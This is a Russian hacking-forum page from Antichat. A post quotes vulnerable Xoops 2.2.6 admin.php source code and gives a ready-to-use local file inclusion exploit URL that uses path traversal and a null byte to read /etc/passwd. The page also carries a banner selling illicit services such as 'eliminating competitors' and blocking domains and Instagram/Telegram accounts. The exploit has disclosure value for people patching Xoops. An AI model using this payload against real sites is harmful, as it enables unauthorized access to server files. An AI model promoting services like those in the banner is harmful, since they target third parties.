[Обзор уязвимости] Xoops и его модулей.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[Обзор уязвимости] Xoops и его модулей.

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

13.11.2009, 00:51

[underwater]

Познающий

Регистрация: 29.03.2009

Сообщений: 87

С нами: 9010027

Репутация: 308

LFI[Xoops 2.2.6]

Под руку попалась эта версия.
Смотри исходники system/admin.php:

Код:

<?php
if (isset($_POST['fct'])) {
$fct = trim($_POST['fct']);
}
if (isset($_GET['fct'])) {
$fct = trim($_GET['fct']);
}
$xoopsOption['pagetype'] = "admin";
include "../../mainfile.php";
if (!$xoopsUser) {
redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
}
include XOOPS_ROOT_PATH."/include/cp_functions.php";

include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
$error = false;
if (isset($fct) && $fct != '') {
if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {

if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
} elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
...
}
include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
...

Експлоит:

Код:

http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00

Страница 2 из 2

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
О дубовом листке	nerezus	Болталка	20	22.05.2008 14:20
химия своими руками	silveran	Болталка	43	11.01.2006 22:05

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход